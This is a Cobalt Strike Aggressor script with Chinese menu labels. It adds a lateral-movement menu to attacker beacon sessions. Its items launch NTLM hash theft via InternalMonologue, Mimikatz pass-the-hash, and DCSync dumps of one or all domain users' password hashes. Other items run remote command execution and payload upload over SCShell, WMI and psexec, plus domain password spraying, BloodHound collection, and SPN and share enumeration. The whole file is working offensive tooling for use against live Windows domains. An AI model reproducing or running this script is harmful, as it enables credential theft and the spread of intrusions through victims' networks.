##############################
#                            #
#                            #
#                            #
#       xway.cn@panda8       #
#       secquan.org@panda8   #
#		t00ls.com@panda8     #
#                            #
#                            #
#                            #
##############################
	menu "横向移动" {
    	item "NTLM hash"{
    		local('$bid');
               foreach $bid ($1){
                   internal_monologue($bid);
            }
    	}
sub internal_monologue{
	$binary = script_resource("/script/InternalMonologue.exe");
	$help = "Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS";
	beacon_command_register("lazagne", $help, "Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS.\n\n$help");
	if(!-exists $binary)
	{
		berror($1, "InternalMonologue binary cannot be found at $binary");
		return;
	}
	$args = "-Downgrade True -Verbose True";
	bexecute_assembly($1, $binary, $args);
}	


		
		item "SharpHound3.0" {
			bexecute_assembly($1, script_resource("/script/SharpHound.exe"), "");
		}


    	item "Mimikatz-pth"{
    		local('$bid');
               foreach $bid ($1){
                   mimikatz_passthehash($bid);
            }
    	}


sub mimikatz_passthehash{
	$bid = $1;
	$dialog = dialog("Pass-The-Hash" , %(beacon => $1 , domain => "GLITTER" , user => "administrator" , hash => "hash") , 
	lambda({
		bpassthehash($3["beacon"] , $3["domain"] , $3["user"] , $3["hash"]);
	}
	)
	);
	dialog_description($dialog, "使用cs内置的mimikatz进行横向");
	drow_text($dialog, "beacon",  "Beacon:");
	drow_text($dialog, "domain",  "Domain:");
	drow_text($dialog, "user",  "User:");
	drow_text($dialog, "hash",  "Hash:");
	dbutton_action($dialog, "Launch");
	dialog_show($dialog);
}

			item "SharpSCshell" {
			$bid = $1['@'];
			$dialog = dialog("SharpSCshell", %(target => "192.168.1.1",service => "testservice",payload => "c:\\windows\\system32\\cmd.exe /c calc",domain => ".",user => "administrator",pass => "123456",bid => $bid), &SCshell);	
			drow_text($dialog, "target", "target:  ");
			drow_text($dialog, "service", "service:  ");
			drow_text($dialog, "payload", "payload:  ");
			drow_text($dialog, "domain", "domain:  ");
			drow_text($dialog, "user", "user:  ");		
			drow_text($dialog, "pass", "pass:  ");			
			dialog_description($dialog, "通过DCE/RPC协议进行无文件横向移动");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SCshell {
		bexecute_assembly($bid, script_resource("/script/SharpSCshell.exe"), "$3['target'] $3['service'] \"$3['payload']\" $3['domain'] $3['user'] $3['pass']");
}	

	    menu "sharpwmi" {
			item "命令执行" {
				$bid = $1;
				$dialog = dialog("命令执行", %(ip => "",user => "administrator",pass => "",cmd => "whoami", bid => $bid), &sharpwmi_cmd);
				drow_text($dialog, "ip",  "ip: ");
				drow_text($dialog, "user",  "user: ");
				drow_text($dialog, "pass",  "pass: ");
				drow_text($dialog, "cmd",  "cmd: "); 
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub sharpwmi_cmd{
		$arg = join(' ', @($3['ip'],$3['user'],$3['pass'],"cmd",$3['cmd']));
		bexecute_assembly($bid, script_resource("/script/sharpwmi.exe"), $arg);	
} 

			item "文件上传" {
				$bid = $1;
				$dialog = dialog("文件上传", %(ip => "",user => "administrator",pass => "",localpath => "",remotepath => "c:\\windows\\temp\\payload.exe",bid => $bid), &sharpwmi_upload);
				dialog_description($dialog, "只支持上传512kb以下的文件");
				drow_text($dialog, "ip",  "ip: ");
				drow_text($dialog, "user",  "user: ");
				drow_text($dialog, "pass",  "pass: ");
				drow_file($dialog, "localpath", "localfile: ");
				drow_text($dialog, "remotepath",  "remotepath: "); 
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }	
sub sharpwmi_upload{
		$arg = join(' ', @($3['ip'],$3['user'],$3['pass'],"upload",$3['localpath'],$3['remotepath']));
		bexecute_assembly($bid, script_resource("/script/sharpwmi.exe"), $arg);	
} 	

			item "PTH命令执行" {
				$bid = $1;
				$dialog = dialog("PTH命令执行", %(ip => "",cmd => "whoami", bid => $bid), &sharpwmi_pth_cmd);
				drow_text($dialog, "ip",  "ip: ");
				drow_text($dialog, "cmd",  "cmd: "); 
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }
sub sharpwmi_pth_cmd{
		$arg = join(' ', @("pth",$3['ip'],"cmd",$3['cmd']));
		bexecute_assembly($bid, script_resource("/script/sharpwmi.exe"), $arg);	
} 

			item "PTH文件上传" {
				$bid = $1;
				$dialog = dialog("PTH文件上传", %(ip => "",localpath => "",remotepath => "c:\\windows\\temp\\payload.exe",bid => $bid), &sharpwmi_pth_upload);
				dialog_description($dialog, "只支持上传512kb以下的文件");
				drow_text($dialog, "ip",  "ip: ");
				drow_file($dialog, "localpath", "localfile: ");
				drow_text($dialog, "remotepath",  "remotepath: "); 
				dbutton_action($dialog, "运行");
				dialog_show($dialog);
        }	
sub sharpwmi_pth_upload{
		$arg = join(' ', @("pth",$3['ip'],"upload",$3['localpath'],$3['remotepath']));
		bexecute_assembly($bid, script_resource("/script/sharpwmi.exe"), $arg);	
} 		
		}

	    menu "WMIHACKER" {
			item "上传WMIHACKER" {
				$bid = $1;
				$dialog = dialog("上传WMIHACKER", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &WMIHACKER);
				drow_text($dialog, "UploadPath",  "上传路径: "); 	
				dbutton_action($dialog, "上传");
				dialog_show($dialog);
        }
sub WMIHACKER {

    bcd($bid, $3['UploadPath']);
        bupload($bid, script_resource("/script/WMIHACKER.vbs"));
    

}
            item "cmd"{
                $bid = $1['@'];
                $Dialog = dialog("WMIHACKER_cmd",%(host => "127.0.0.1", user => "administrator", pass => "password", command => "systeminfo", GETRES => "1 or 0",bid => $bid),&WMIHACKER_cmd);
                dialog_description($Dialog, "");
                drow_text($Dialog, "host", "host: ");
				drow_text($Dialog, "user", "user: ");
				drow_text($Dialog, "pass", "pass: ");
				drow_text($Dialog, "command", "command: ");
				drow_text($Dialog, "GETRES", "GETRES: ");
                dbutton_action($Dialog, "运行");
                dialog_show($Dialog);
                }
sub WMIHACKER_cmd{
    local('$host $user $pass $command $GETRES');
    $host = $3['host'];
	$user = $3['user'];
	$pass = $3['pass'];
	$command = $3['command'];
	$GETRES = $3['GETRES'];
	bshell($bid, "cscript WMIHACKER.vbs /cmd  $+ $host  $+ $user  $+ \"$pass\"  $+ \"$command\"  $+ $GETRES");
} 

            item "shell"{
                $bid = $1['@'];
                $Dialog = dialog("WMIHACKER_shell",%(host => "127.0.0.1", user => "administrator", pass => "password", command => "systeminfo", GETRES => "1 or 0",bid => $bid),&WMIHACKER_cmd);
                dialog_description($Dialog, "");
                drow_text($Dialog, "host", "host: ");
				drow_text($Dialog, "user", "user: ");
				drow_text($Dialog, "pass", "pass: ");
				drow_text($Dialog, "command", "command: ");
				drow_text($Dialog, "GETRES", "GETRES: ");
                dbutton_action($Dialog, "运行");
                dialog_show($Dialog);
                }
sub WMIHACKER_cmd{
    local('$host $user $pass $command $GETRES');
    $host = $3['host'];
	$user = $3['user'];
	$pass = $3['pass'];
	$command = $3['command'];
	$GETRES = $3['GETRES'];
	bshell($bid, "cscript WMIHACKER.vbs /cmd  $+ $host  $+ $user  $+ \"$pass\"  $+ \"$command\"  $+ $GETRES");
}

            item "upload"{
                $bid = $1['@'];
                $Dialog = dialog("WMIHACKER_upload",%(host => "127.0.0.1", user => "administrator", pass => "password", localpath => "c:\\windows\\system32\\calc.exe", remotepath => "C:\\\$Recycle.Bin",bid => $bid),&WMIHACKER_upload);
                dialog_description($Dialog, "");
                drow_text($Dialog, "host", "host: ");
				drow_text($Dialog, "user", "user: ");
				drow_text($Dialog, "pass", "pass: ");
				drow_text($Dialog, "localpath", "localpath: ");
				drow_text($Dialog, "remotepath", "remotepath: ");
                dbutton_action($Dialog, "运行");
                dialog_show($Dialog);
                }
sub WMIHACKER_upload{
    local('$host $user $pass $localpath $remotepath');
    $host = $3['host'];
	$user = $3['user'];
	$pass = $3['pass'];
	$localpath = $3['localpath'];
	$remotepath = $3['remotepath'];
	bshell($bid, "cscript WMIHACKER.vbs /upload  $+ $host  $+ $user  $+ \"$pass\"  $+ \"$localpath\"  $+ \"$remotepath\"");
} 

            item "download"{
                $bid = $1['@'];
                $Dialog = dialog("WMIHACKER_download",%(host => "127.0.0.1", user => "administrator", pass => "password", localpath => "c:\\calc", remotepath => "c:\\windows\\system32\\calc.exe",bid => $bid),&WMIHACKER_download);
                dialog_description($Dialog, "");
                drow_text($Dialog, "host", "host: ");
				drow_text($Dialog, "user", "user: ");
				drow_text($Dialog, "pass", "pass: ");
				drow_text($Dialog, "localpath", "localpath: ");
				drow_text($Dialog, "remotepath", "remotepath: ");
                dbutton_action($Dialog, "运行");
                dialog_show($Dialog);
                }
sub WMIHACKER_download{
    local('$host $user $pass $localpath $remotepath');
    $host = $3['host'];
	$user = $3['user'];
	$pass = $3['pass'];
	$localpath = $3['localpath'];
	$remotepath = $3['remotepath'];
	bshell($bid, "cscript WMIHACKER.vbs /download  $+ $host  $+ $user  $+ \"$pass\"  $+ \"$localpath\"  $+ \"$remotepath\"");
} 
		}
		

menu "SharpExec" {

			item "上传文件并执行" {
			$bid = $1['@'];
			$dialog = dialog("上传文件并执行", %(type => "psexec",ip => "",user => "TargetUser",pass => "",domain => "TargetDomain",localpath => "",remotepath => "C:\\payload.exe",bid => $bid), &SharpExec_file);
			dialog_description($dialog, "将文件从User1上载到远程系统上的C:\\并且执行该文件,psexec以system权限执行,wmi以targetuser权限执行");
			drow_combobox($dialog, "type", "type", @("psexec", "wmi"));
			drow_text($dialog, "ip", "ip:  ");	
			drow_text($dialog, "user", "user:  ");	
			drow_text($dialog, "pass", "pass:  ");	
			drow_text($dialog, "domain", "domain:  ");		
			drow_file($dialog, "localpath", "本地文件: ");
			drow_text($dialog, "remotepath", "远程路径:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpExec_file {
		$arg = join('', @("-m=",$3['type']," ","-i=",$3['ip']," ","-u=",$3['user']," ","-p=",$3['pass']," ","-d=",$3['domain']," ","-f=",$3['localpath']," ","-e=",$3['remotepath']));
		bexecute_assembly($bid, script_resource("/script/SharpExec.exe"), $arg);
        }
		
			item "远程执行命令" {
			$bid = $1['@'];
			$dialog = dialog("远程执行命令", %(type => "psexec",ip => "",user => "TargetUser",pass => "",domain => "TargetDomain",cmdpath => "C:\\Windows\\System32\\cmd.exe",args => "\"whoami\"",bid => $bid), &SharpExec_cmd);
			dialog_description($dialog, "远程执行命令,psexec以system权限执行,wmi以targetuser权限执行");
			drow_combobox($dialog, "type", "type", @("psexec", "wmi"));
			drow_text($dialog, "ip", "ip:  ");	
			drow_text($dialog, "user", "user:  ");	
			drow_text($dialog, "pass", "pass:  ");	
			drow_text($dialog, "domain", "domain:  ");		
			drow_text($dialog, "cmdpath", "cmdpath:  ");
			drow_text($dialog, "args", "args:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpExec_cmd {
		$arg = join('', @("-m=",$3['type']," ","-i=",$3['ip']," ","-u=",$3['user']," ","-p=",$3['pass']," ","-d=",$3['domain']," ","-e=",$3['cmdpath']," ","-c=",$3['args']));
		bexecute_assembly($bid, script_resource("/script/SharpExec.exe"), $arg);
        }
		}
		
			item "枚举域用户密码" {
			$bid = $1['@'];
			$dialog = dialog("SharpDomainSpray", %(content => "",bid => $bid), &SharpDomainSpray);
			dialog_description($dialog, "枚举域内用户密码（Pass2User指定单个密码-枚举，User2Pass指定单个用户-爆破）。");
			drow_text($dialog, "content", "content:  ");		
			drow_combobox($dialog, "type", "type", @("-User2Pass", "-Pass2User"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpDomainSpray {
	$arg = join(' ', @($3['type'],$3['content']));
	bexecute_assembly($bid, script_resource("/script/SharpDomainSpray/SharpDomainSpray.exe"), $arg);
} 

		item "获取SPN" {
			bexecute_assembly($1, script_resource("/script/SPNSearcher.exe"), "");
		}

		 menu "获取域用户hash" {
		 		item "指定用户" {
		 			$dialog = dialog("DomainInfo" , %(bid => $1['@'] , domain => "域名" , user => "用户") , lambda({ bdcsync($3["bid"] , $3["domain"] , $3["user"]) }));
		 			dialog_description($dialog,"使用Mimikatz去获取指定用户的密码Hash");
		 			drow_text($dialog,"bid","Bid:");
		 			drow_text($dialog,"domain","Domain:");
		 			drow_text($dialog,"user","User:");
		 			dbutton_action($dialog,"Exploit");
		 			dialog_show($dialog);
 		 		}
		 		item "全部用户" {
		 			$dialog = dialog("DomainInfo", %(bid => $1['@'] , domain => "域名") , lambda({ bdcsync($3["bid"] , $3["domain"])}));
		 			dialog_description($dialog, "获取全部用户的密码Hash");
		 			drow_text($dialog, "domain","Domain:");
		 			dbutton_action($dialog,"Exploit");
		 			dialog_show($dialog);

		 		}
		 }

			item "获取域共享" {
			$bid = $1['@'];
			$dialog = dialog("获取域共享", %(bid => $bid), &SharpShares);
			dialog_description($dialog, "列出当前域中所有计算机的网络共享信息,也可以将所有计算机名称转换为IP地址。");
			drow_combobox($dialog, "type", "type:", @("ips","shares"));		
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpShares {
	$arg = join(' ',  @($3['type']));
	bexecute_assembly($bid, script_resource("/script/SharpShares.exe"), $arg);
}

			item "获取远程主机上的进程" {
			$bid = $1['@'];
			$dialog = dialog("获取远程主机上的进程", %(computername => "win7.sun.com",user => "administrator",pass => "dc123.com",bid => $bid), &net_domaintask);
			dialog_description($dialog, "解析域名");
			drow_text($dialog, "computername", "computername:  ");
			drow_text($dialog, "user", "user:  ");
			drow_text($dialog, "pass", "pass:  ");			
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub net_domaintask {
	$arg = join(' ',  @("Get-Process -ComputerName",$3['computername'],"-Username",$3['user'],"-Password",$3['pass']));
	bexecute_assembly($bid, script_resource("/script/NoPowerShell.exe"), $arg);
}	


		
		}